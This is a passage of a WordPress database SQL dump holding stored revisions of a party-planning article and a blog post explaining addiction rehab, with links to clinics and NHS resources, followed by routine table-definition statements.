the day. You’ll need to research potential even companies and check the success they’ve overseen in the past.','The Fundamentals in Party Planning','','inherit','closed','closed','','200-autosave-v1','','','2019-05-31 15:20:23','2019-05-31 15:20:23','',200,'http://www.dailyjolly.co.uk/200-autosave-v1',0,'revision','',0),(204,1,'2019-05-31 15:21:19','2019-05-31 15:21:19','<em>Party planning, whether it’s for a wedding, corporate event or a birthday, requires a bit of work in planning and preparation to make sure everything goes according to plan.</em>\r\n\r\n<strong>Choosing a date for the event is just the start.</strong> There are a few key aspects you’ll have to consider when it comes to planning your party. Here at Daily Jolly, we’ve asked around and researched some of the fundamentals of party planning that you’ll have to think about too.\r\n<h3> Invites</h3>\r\nThe invitation list is definitely key when it comes to planning your party. What sort of party do you want? You’ll have to think about the different types of atmosphere your party will have depending on the guests you invite.\r\n<blockquote>Furthermore, you can really begin to set the theme for your party by choosing from a range of invite designs.</blockquote>\r\nBeyond that, party invites are important simply because it’ll give you a clear indication of how many people are coming to the event. <a href=\"https://www.canva.com/create/cards/party-invitations/\">Design your party invites.</a>\r\n<h3>Theme</h3>\r\nTo create a truly memorable event, it’s always worth thinking and planning for a specific theme in mind. A <a href=\"https://chrystinanoel.com/2017/01/31/choose-party-theme-party-planning-101/\">well-chosen theme</a> can really add to the occasion, and make it a night worth remembering for all your guests.\r\n\r\n<strong>You shouldn’t try and be too elaborate with your theme, and you should also think about the guests you’ll be inviting too.</strong>\r\n\r\nUltimately, you want to choose a theme that’ll add to the experience, not detract from it, so it’s important to choose the right theme for the night.\r\n<h3>Equipment Hire</h3>\r\nTheme planning and choosing a venue are incredibly important, but you want to make sure you have the <a href=\"https://www.crackajack-partyhire.com.au/\">necessary equipment</a> to make the night a success.\r\n\r\nThere is a range of services that offer party and event equipment hire, as well as offering staff and food services for the day. You’ll need to research potential even companies and check the success they’ve overseen in the past.','The Fundamentals in Party Planning','','inherit','closed','closed','','200-revision-v1','','','2019-05-31 15:21:19','2019-05-31 15:21:19','',200,'http://www.dailyjolly.co.uk/200-revision-v1',0,'revision','',0),(213,1,'2021-08-20 08:39:06','2021-08-20 08:39:06','<h2><a href=\"/\"><span data-preserver-spaces=\"true\">Going to rehab is the first step in every addict\'s journey so they can get better.</span></a></h2>\r\n<span data-preserver-spaces=\"true\">People can go to rehab to fix any issue they are experiencing.</span>\r\n<ul>\r\n 	<li><span data-preserver-spaces=\"true\"><em>Drug addiction</em> - an addiction to any type of drugs i.e. prescription painkillers, narcotics and other controlled substances.</span></li>\r\n 	<li><em>Alcohol addiction</em><span data-preserver-spaces=\"true\">  - an addiction to any alcoholic beverage that is causing the addict to have a strong dependency on the substance.</span></li>\r\n 	<li><span data-preserver-spaces=\"true\"><em>Behavioural addictions</em> - an addiction to behaviour patterns such as  </span><span data-preserver-spaces=\"true\">gambling</span><span data-preserver-spaces=\"true\">, gaming, social media and shopping.</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Anyone who is attending clinics similar to one which treats alcohol and <a href=\"https://www.sunshinebehavioralhealth.com/texas/del-rio/\">substance abuse in Del Rio, TX</a> is given access to addiction specialists that are there to help them during their stay.</span>\r\n\r\n<p><strong>Going to a rehab centre like <a href=\"https://phoenixhouseca.org/santa-ana-residential-services/\">The Phoenix House Santa Ana</a> area, does not only mean having a detox and then being sent home. The purpose of rehab is to uncover the underlying issues that have a link to the person\'s addiction.</strong></p>\r\n<h2><span data-preserver-spaces=\"true\">The first step is admitting you need help</span></h2>\r\n<span data-preserver-spaces=\"true\">Someone\'s rehab journey cannot fully start until they realise their addiction and know they will benefit from medical help so they can effectively recover.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It is hard to recognise changes in your habits and behaviour - but it is possible to do so with the help of loved ones that care about you and want you to get better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whether it is you or a loved one that may require a rehab centre, Castle Craig is an addiction treatment centre with years of experience in assisting former addicts in <a href=\"https://castlecraig.co.uk/rehab\" target=\"_blank\" rel=\"noopener\">overcoming their addiction</a>.</span>\r\n\r\n<span data-preserver-spaces=\"true\">People seeking a rehab centre may have come across a number of options and are unclear which one to choose.</span>\r\n<ul>\r\n 	<li><span data-preserver-spaces=\"true\">If you\'re not sure which one is right for you, go to Castle Craig to learn more about their recovery centre.  </span></li>\r\n</ul>\r\n<h2><span data-preserver-spaces=\"true\">The difference rehab makes</span></h2>\r\n<span data-preserver-spaces=\"true\">People who complete their stay at rehab  </span><a class=\"editor-rtfLink\" href=\"https://www.psychologytoday.com/gb/blog/craving/201402/how-often-do-long-term-sober-alcoholics-and-addicts-relapse\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">are less likely to relapse</span></a><span data-preserver-spaces=\"true\">  and are also given the right tools that will help them form healthy habits so they can replace their previous addiction habits.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Addicts and their families may choose a residential rehab centre as they believe it will provide them with a safe environment to detox and focus on getting better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">At residential rehab centres, they do not judge any of the patients and instead focus on uncovering the reasons that may have developed their addiction - such as any underlying mental health issues.</span>\r\n<h2><span data-preserver-spaces=\"true\">There is no such thing as too late to get help</span></h2>\r\n<span data-preserver-spaces=\"true\">For free information and resources on how to get help for any addiction you or a loved one may be experiencing, please visit the  </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">NHS addiction page for information</span></a><span data-preserver-spaces=\"true\">.</span>\r\n<h3><span data-preserver-spaces=\"true\">More</span></h3>\r\n<ul>\r\n 	<li><a class=\"editor-rtfLink\" href=\"https://publichealthmatters.blog.gov.uk/2016/11/03/what-weve-learned-from-our-annual-drug-and-alcohol-treatment-statistics/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What we\'ve learned from our annual drug and alcohol treatment statistics | Gov.UK</span></a></li>\r\n 	<li><a class=\"editor-rtfLink\" href=\"https://www.thefix.com/mental-health-awareness-sobriety\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Mental Health Awareness in Sobriety | The Fix  </span></a></li>\r\n 	<li><a class=\"editor-rtfLink\" href=\"https://www.health.harvard.edu/blog/does-addiction-last-a-lifetime-2018100814962\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Does addiction last a lifetime? - Harvard Health Blog</span></a></li>\r\n</ul>','What does it mean to go to rehab?','','publish','closed','closed','','what-does-it-mean-to-go-to-rehab','','','2021-08-24 11:56:19','2021-08-24 11:56:19','',0,'https://www.dailyjolly.co.uk/?p=213',0,'post','',0),(214,1,'2021-08-20 08:12:18','2021-08-20 08:12:18','','Rehabilitation','','inherit','','closed','','rehabilitation','','','2021-08-20 08:12:18','2021-08-20 08:12:18','',213,'http://www.dailyjolly.co.uk/wp-content/uploads/2021/08/Rehabilitation.jpg',0,'attachment','image/jpeg',0),(215,1,'2021-08-20 08:39:06','2021-08-20 08:39:06','<h2><span data-preserver-spaces=\"true\">Going to rehab is the first step in every addict\'s journey so they can get better.</span></h2>\r\n<span data-preserver-spaces=\"true\">People can go to rehab to fix any issue they are experiencing.</span>\r\n<ul>\r\n 	<li><span data-preserver-spaces=\"true\">Drug addiction - an addiction to any type of drugs i.e. prescription painkillers, narcotics and other controlled substances.</span></li>\r\n 	<li><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/alcohol-support/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Alcohol addiction</span></a><span data-preserver-spaces=\"true\"> - an addiction to any alcoholic beverage that is causing the addict to have a strong dependency on the substance.</span></li>\r\n 	<li><span data-preserver-spaces=\"true\">Behavioural addictions - an addiction to behaviour patterns such as </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/gambling-addiction/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">gambling</span></a><span data-preserver-spaces=\"true\">, gaming, social media and shopping.</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Anyone who is attending rehab for any of these addictions is given access to addiction specialists that are there to help them during their stay.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Going to rehab does not only mean having a detox and then being sent home. The purpose of rehab is to uncover the underlying issues that have a link to the person\'s addiction.</span>\r\n<h2><span data-preserver-spaces=\"true\">The first step is admitting you need help</span></h2>\r\n<span data-preserver-spaces=\"true\">Someone\'s rehab journey cannot fully start until they realise their addiction and know they will benefit from medical help so they can effectively recover.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It is hard to recognise changes in your habits and behaviour - but it is possible to do so with the help of loved ones that care about you and want you to get better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whether it is you or a loved one that may require a rehab centre, Castle Craig is an addiction treatment centre with years of experience in assisting former addicts in overcoming their addiction.</span>\r\n\r\n<span data-preserver-spaces=\"true\">People seeking a rehab centre may have come across a number of options and are unclear which one to choose. If you\'re not sure which one is right for you, go to Castle Craig to learn more about their drug recovery centre. </span><a class=\"editor-rtfLink\" href=\"https://castlecraig.co.uk/rehab/drug-rehab\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Read more here.</span></a>\r\n<h2><span data-preserver-spaces=\"true\">The difference rehab makes</span></h2>\r\n<span data-preserver-spaces=\"true\">People who complete their stay at rehab </span><a class=\"editor-rtfLink\" href=\"https://www.psychologytoday.com/gb/blog/craving/201402/how-often-do-long-term-sober-alcoholics-and-addicts-relapse\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">are less likely to relapse</span></a><span data-preserver-spaces=\"true\"> and are also given the right tools that will help them form healthy habits so they can replace their previous addiction habits.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Addicts and their families may choose a residential rehab centre as they believe it will provide them with a safe environment to detox and focus on getting better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">At residential rehab centres, they do not judge any of the patients and instead focus on uncovering the reasons that may have developed their addiction - such as any underlying mental health issues.</span>\r\n<h2><span data-preserver-spaces=\"true\">There is no such thing as too late to get help</span></h2>\r\n<span data-preserver-spaces=\"true\">For free information and resources on how to get help for any addiction you or a loved one may be experiencing, please visit the </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">NHS addiction page for information</span></a><span data-preserver-spaces=\"true\">.</span>\r\n<h2><span data-preserver-spaces=\"true\">More</span></h2>\r\n<a class=\"editor-rtfLink\" href=\"https://publichealthmatters.blog.gov.uk/2016/11/03/what-weve-learned-from-our-annual-drug-and-alcohol-treatment-statistics/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What we\'ve learned from our annual drug and alcohol treatment statistics | Gov.UK</span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.thefix.com/mental-health-awareness-sobriety\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Mental Health Awareness in Sobriety | The Fix </span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.health.harvard.edu/blog/does-addiction-last-a-lifetime-2018100814962\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Does addiction last a lifetime? - Harvard Health Blog</span></a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;','What does it mean to go to rehab?','','inherit','closed','closed','','213-revision-v1','','','2021-08-20 08:39:06','2021-08-20 08:39:06','',213,'https://www.dailyjolly.co.uk/?p=215',0,'revision','',0),(216,1,'2021-08-20 08:50:22','2021-08-20 08:50:22','<h2><span data-preserver-spaces=\"true\">Going to rehab is the first step in every addict\'s journey so they can get better.</span></h2>\r\n<span data-preserver-spaces=\"true\">People can go to rehab to fix any issue they are experiencing.</span>\r\n<ul>\r\n 	<li><span data-preserver-spaces=\"true\">Drug addiction - an addiction to any type of drugs i.e. prescription painkillers, narcotics and other controlled substances.</span></li>\r\n 	<li><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/alcohol-support/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Alcohol addiction</span></a><span data-preserver-spaces=\"true\"> - an addiction to any alcoholic beverage that is causing the addict to have a strong dependency on the substance.</span></li>\r\n 	<li><span data-preserver-spaces=\"true\">Behavioural addictions - an addiction to behaviour patterns such as </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/gambling-addiction/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">gambling</span></a><span data-preserver-spaces=\"true\">, gaming, social media and shopping.</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Anyone who is attending rehab for any of these addictions is given access to addiction specialists that are there to help them during their stay.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Going to rehab does not only mean having a detox and then being sent home. The purpose of rehab is to uncover the underlying issues that have a link to the person\'s addiction.</span>\r\n<h2><span data-preserver-spaces=\"true\">The first step is admitting you need help</span></h2>\r\n<span data-preserver-spaces=\"true\">Someone\'s rehab journey cannot fully start until they realise their addiction and know they will benefit from medical help so they can effectively recover.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It is hard to recognise changes in your habits and behaviour - but it is possible to do so with the help of loved ones that care about you and want you to get better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whether it is you or a loved one that may require a rehab centre, Castle Craig is an addiction treatment centre with years of experience in assisting former addicts in overcoming their addiction.</span>\r\n\r\n<span data-preserver-spaces=\"true\">People seeking a rehab centre may have come across a number of options and are unclear which one to choose. If you\'re not sure which one is right for you, go to Castle Craig to learn more about their drug recovery centre. </span><a class=\"editor-rtfLink\" href=\"https://castlecraig.co.uk/rehab/drug-rehab\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Read more here.</span></a>\r\n<h2><span data-preserver-spaces=\"true\">The difference rehab makes</span></h2>\r\n<span data-preserver-spaces=\"true\">People who complete their stay at rehab </span><a class=\"editor-rtfLink\" href=\"https://www.psychologytoday.com/gb/blog/craving/201402/how-often-do-long-term-sober-alcoholics-and-addicts-relapse\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">are less likely to relapse</span></a><span data-preserver-spaces=\"true\"> and are also given the right tools that will help them form healthy habits so they can replace their previous addiction habits.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Addicts and their families may choose a residential rehab centre as they believe it will provide them with a safe environment to detox and focus on getting better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">At residential rehab centres, they do not judge any of the patients and instead focus on uncovering the reasons that may have developed their addiction - such as any underlying mental health issues.</span>\r\n<h2><span data-preserver-spaces=\"true\">There is no such thing as too late to get help</span></h2>\r\n<span data-preserver-spaces=\"true\">For free information and resources on how to get help for any addiction you or a loved one may be experiencing, please visit the </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">NHS addiction page for information</span></a><span data-preserver-spaces=\"true\">.</span>\r\n<h3><span data-preserver-spaces=\"true\">More</span></h3>\r\n<a class=\"editor-rtfLink\" href=\"https://publichealthmatters.blog.gov.uk/2016/11/03/what-weve-learned-from-our-annual-drug-and-alcohol-treatment-statistics/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What we\'ve learned from our annual drug and alcohol treatment statistics | Gov.UK</span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.thefix.com/mental-health-awareness-sobriety\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Mental Health Awareness in Sobriety | The Fix </span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.health.harvard.edu/blog/does-addiction-last-a-lifetime-2018100814962\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Does addiction last a lifetime? - Harvard Health Blog</span></a>','What does it mean to go to rehab?','','inherit','closed','closed','','213-revision-v1','','','2021-08-20 08:50:22','2021-08-20 08:50:22','',213,'https://www.dailyjolly.co.uk/?p=216',0,'revision','',0),(217,1,'2021-08-20 09:03:34','2021-08-20 09:03:34','<h2><span data-preserver-spaces=\"true\">Going to rehab is the first step in every addict\'s journey so they can get better.</span></h2>\r\n<span data-preserver-spaces=\"true\">People can go to rehab to fix any issue they are experiencing.</span>\r\n<ul>\r\n 	<li><span data-preserver-spaces=\"true\">Drug addiction - an addiction to any type of drugs i.e. prescription painkillers, narcotics and other controlled substances.</span></li>\r\n 	<li><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/alcohol-support/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Alcohol addiction</span></a><span data-preserver-spaces=\"true\"> - an addiction to any alcoholic beverage that is causing the addict to have a strong dependency on the substance.</span></li>\r\n 	<li><span data-preserver-spaces=\"true\">Behavioural addictions - an addiction to behaviour patterns such as </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/gambling-addiction/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">gambling</span></a><span data-preserver-spaces=\"true\">, gaming, social media and shopping.</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Anyone who is attending rehab for any of these addictions is given access to addiction specialists that are there to help them during their stay.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Going to rehab does not only mean having a detox and then being sent home. The purpose of rehab is to uncover the underlying issues that have a link to the person\'s addiction.</span>\r\n<h2><span data-preserver-spaces=\"true\">The first step is admitting you need help</span></h2>\r\n<span data-preserver-spaces=\"true\">Someone\'s rehab journey cannot fully start until they realise their addiction and know they will benefit from medical help so they can effectively recover.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It is hard to recognise changes in your habits and behaviour - but it is possible to do so with the help of loved ones that care about you and want you to get better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whether it is you or a loved one that may require a rehab centre, Castle Craig is an addiction treatment centre with years of experience in assisting former addicts in overcoming their addiction.</span>\r\n\r\n<span data-preserver-spaces=\"true\">People seeking a rehab centre may have come across a number of options and are unclear which one to choose. If you\'re not sure which one is right for you, go to Castle Craig to learn more about their recovery centre. </span><a class=\"editor-rtfLink\" href=\"https://castlecraig.co.uk/rehab/drug-rehab\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Read more here.</span></a>\r\n<h2><span data-preserver-spaces=\"true\">The difference rehab makes</span></h2>\r\n<span data-preserver-spaces=\"true\">People who complete their stay at rehab </span><a class=\"editor-rtfLink\" href=\"https://www.psychologytoday.com/gb/blog/craving/201402/how-often-do-long-term-sober-alcoholics-and-addicts-relapse\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">are less likely to relapse</span></a><span data-preserver-spaces=\"true\"> and are also given the right tools that will help them form healthy habits so they can replace their previous addiction habits.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Addicts and their families may choose a residential rehab centre as they believe it will provide them with a safe environment to detox and focus on getting better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">At residential rehab centres, they do not judge any of the patients and instead focus on uncovering the reasons that may have developed their addiction - such as any underlying mental health issues.</span>\r\n<h2><span data-preserver-spaces=\"true\">There is no such thing as too late to get help</span></h2>\r\n<span data-preserver-spaces=\"true\">For free information and resources on how to get help for any addiction you or a loved one may be experiencing, please visit the </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">NHS addiction page for information</span></a><span data-preserver-spaces=\"true\">.</span>\r\n<h3><span data-preserver-spaces=\"true\">More</span></h3>\r\n<a class=\"editor-rtfLink\" href=\"https://publichealthmatters.blog.gov.uk/2016/11/03/what-weve-learned-from-our-annual-drug-and-alcohol-treatment-statistics/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What we\'ve learned from our annual drug and alcohol treatment statistics | Gov.UK</span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.thefix.com/mental-health-awareness-sobriety\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Mental Health Awareness in Sobriety | The Fix </span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.health.harvard.edu/blog/does-addiction-last-a-lifetime-2018100814962\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Does addiction last a lifetime? - Harvard Health Blog</span></a>','What does it mean to go to rehab?','','inherit','closed','closed','','213-revision-v1','','','2021-08-20 09:03:34','2021-08-20 09:03:34','',213,'https://www.dailyjolly.co.uk/?p=217',0,'revision','',0),(218,1,'2021-08-20 09:04:35','2021-08-20 09:04:35','<h2><span data-preserver-spaces=\"true\">Going to rehab is the first step in every addict\'s journey so they can get better.</span></h2>\r\n<span data-preserver-spaces=\"true\">People can go to rehab to fix any issue they are experiencing.</span>\r\n<ul>\r\n 	<li><span data-preserver-spaces=\"true\">Drug addiction - an addiction to any type of drugs i.e. prescription painkillers, narcotics and other controlled substances.</span></li>\r\n 	<li><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/alcohol-support/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Alcohol addiction</span></a><span data-preserver-spaces=\"true\"> - an addiction to any alcoholic beverage that is causing the addict to have a strong dependency on the substance.</span></li>\r\n 	<li><span data-preserver-spaces=\"true\">Behavioural addictions - an addiction to behaviour patterns such as </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/gambling-addiction/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">gambling</span></a><span data-preserver-spaces=\"true\">, gaming, social media and shopping.</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Anyone who is attending rehab for any of these addictions is given access to addiction specialists that are there to help them during their stay.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Going to rehab does not only mean having a detox and then being sent home. The purpose of rehab is to uncover the underlying issues that have a link to the person\'s addiction.</span>\r\n<h2><span data-preserver-spaces=\"true\">The first step is admitting you need help</span></h2>\r\n<span data-preserver-spaces=\"true\">Someone\'s rehab journey cannot fully start until they realise their addiction and know they will benefit from medical help so they can effectively recover.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It is hard to recognise changes in your habits and behaviour - but it is possible to do so with the help of loved ones that care about you and want you to get better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whether it is you or a loved one that may require a rehab centre, Castle Craig is an addiction treatment centre with years of experience in assisting former addicts in overcoming their addiction.</span>\r\n\r\n<span data-preserver-spaces=\"true\">People seeking a rehab centre may have come across a number of options and are unclear which one to choose. If you\'re not sure which one is right for you, go to Castle Craig to learn more about their recovery centre. </span><a class=\"editor-rtfLink\" href=\"https://castlecraig.co.uk/rehab\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Read more here.</span></a>\r\n<h2><span data-preserver-spaces=\"true\">The difference rehab makes</span></h2>\r\n<span data-preserver-spaces=\"true\">People who complete their stay at rehab </span><a class=\"editor-rtfLink\" href=\"https://www.psychologytoday.com/gb/blog/craving/201402/how-often-do-long-term-sober-alcoholics-and-addicts-relapse\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">are less likely to relapse</span></a><span data-preserver-spaces=\"true\"> and are also given the right tools that will help them form healthy habits so they can replace their previous addiction habits.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Addicts and their families may choose a residential rehab centre as they believe it will provide them with a safe environment to detox and focus on getting better.</span>\r\n\r\n<span data-preserver-spaces=\"true\">At residential rehab centres, they do not judge any of the patients and instead focus on uncovering the reasons that may have developed their addiction - such as any underlying mental health issues.</span>\r\n<h2><span data-preserver-spaces=\"true\">There is no such thing as too late to get help</span></h2>\r\n<span data-preserver-spaces=\"true\">For free information and resources on how to get help for any addiction you or a loved one may be experiencing, please visit the </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">NHS addiction page for information</span></a><span data-preserver-spaces=\"true\">.</span>\r\n<h3><span data-preserver-spaces=\"true\">More</span></h3>\r\n<a class=\"editor-rtfLink\" href=\"https://publichealthmatters.blog.gov.uk/2016/11/03/what-weve-learned-from-our-annual-drug-and-alcohol-treatment-statistics/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What we\'ve learned from our annual drug and alcohol treatment statistics | Gov.UK</span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.thefix.com/mental-health-awareness-sobriety\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Mental Health Awareness in Sobriety | The Fix </span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.health.harvard.edu/blog/does-addiction-last-a-lifetime-2018100814962\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Does addiction last a lifetime? - Harvard Health Blog</span></a>','What does it mean to go to rehab?','','inherit','closed','closed','','213-revision-v1','','','2021-08-20 09:04:35','2021-08-20 09:04:35','',213,'https://www.dailyjolly.co.uk/?p=218',0,'revision','',0),(221,1,'2021-08-24 11:56:18','2021-08-24 11:56:18','<h2><a href=\"/\"><span data-preserver-spaces=\"true\">Going to rehab is the first step in every addict\'s journey so they can get better.</span></a></h2>\n<span data-preserver-spaces=\"true\">People can go to rehab to fix any issue they are experiencing.</span>\n<ul>\n 	<li><span data-preserver-spaces=\"true\"><em>Drug addiction</em> - an addiction to any type of drugs i.e. prescription painkillers, narcotics and other controlled substances.</span></li>\n 	<li><em>Alcohol addiction</em><span data-preserver-spaces=\"true\"> - an addiction to any alcoholic beverage that is causing the addict to have a strong dependency on the substance.</span></li>\n 	<li><span data-preserver-spaces=\"true\"><em>Behavioural addictions</em> - an addiction to behaviour patterns such as </span><span data-preserver-spaces=\"true\">gambling</span><span data-preserver-spaces=\"true\">, gaming, social media and shopping.</span></li>\n</ul>\n<span data-preserver-spaces=\"true\">Anyone who is attending rehab for any of these addictions is given access to addiction specialists that are there to help them during their stay.</span>\n\n<strong>Going to rehab does not only mean having a detox and then being sent home. The purpose of rehab is to uncover the underlying issues that have a link to the person\'s addiction.</strong>\n<h2><span data-preserver-spaces=\"true\">The first step is admitting you need help</span></h2>\n<span data-preserver-spaces=\"true\">Someone\'s rehab journey cannot fully start until they realise their addiction and know they will benefit from medical help so they can effectively recover.</span>\n\n<span data-preserver-spaces=\"true\">It is hard to recognise changes in your habits and behaviour - but it is possible to do so with the help of loved ones that care about you and want you to get better.</span>\n\n<span data-preserver-spaces=\"true\">Whether it is you or a loved one that may require a rehab centre, Castle Craig is an addiction treatment centre with years of experience in assisting former addicts in <a href=\"https://castlecraig.co.uk/rehab\" target=\"_blank\" rel=\"noopener\">overcoming their addiction</a>.</span>\n\n<span data-preserver-spaces=\"true\">People seeking a rehab centre may have come across a number of options and are unclear which one to choose.</span>\n<ul>\n 	<li><span data-preserver-spaces=\"true\">If you\'re not sure which one is right for you, go to Castle Craig to learn more about their recovery centre. </span></li>\n</ul>\n<h2><span data-preserver-spaces=\"true\">The difference rehab makes</span></h2>\n<span data-preserver-spaces=\"true\">People who complete their stay at rehab </span><a class=\"editor-rtfLink\" href=\"https://www.psychologytoday.com/gb/blog/craving/201402/how-often-do-long-term-sober-alcoholics-and-addicts-relapse\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">are less likely to relapse</span></a><span data-preserver-spaces=\"true\"> and are also given the right tools that will help them form healthy habits so they can replace their previous addiction habits.</span>\n\n<span data-preserver-spaces=\"true\">Addicts and their families may choose a residential rehab centre as they believe it will provide them with a safe environment to detox and focus on getting better.</span>\n\n<span data-preserver-spaces=\"true\">At residential rehab centres, they do not judge any of the patients and instead focus on uncovering the reasons that may have developed their addiction - such as any underlying mental health issues.</span>\n<h2><span data-preserver-spaces=\"true\">There is no such thing as too late to get help</span></h2>\n<span data-preserver-spaces=\"true\">For free information and resources on how to get help for any addiction you or a loved one may be experiencing, please visit the </span><a class=\"editor-rtfLink\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">NHS addiction page for information</span></a><span data-preserver-spaces=\"true\">.</span>\n<h3><span data-preserver-spaces=\"true\">More</span></h3>\n<ul>\n 	<li><a class=\"editor-rtfLink\" href=\"https://publichealthmatters.blog.gov.uk/2016/11/03/what-weve-learned-from-our-annual-drug-and-alcohol-treatment-statistics/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What we\'ve learned from our annual drug and alcohol treatment statistics | Gov.UK</span></a></li>\n 	<li><a class=\"editor-rtfLink\" href=\"https://www.thefix.com/mental-health-awareness-sobriety\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Mental Health Awareness in Sobriety | The Fix </span></a></li>\n 	<li><a class=\"editor-rtfLink\" href=\"https://www.health.harvard.edu/blog/does-addiction-last-a-lifetime-2018100814962\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Does addiction last a lifetime? - Harvard Health Blog</span></a></li>\n</ul>','What does it mean to go to rehab?','','inherit','closed','closed','','213-revision-v1','','','2021-08-24 11:56:18','2021-08-24 11:56:18','',213,'https://www.dailyjolly.co.uk/?p=221',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_404`
--

DROP TABLE IF EXISTS `wp_redirection_404`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
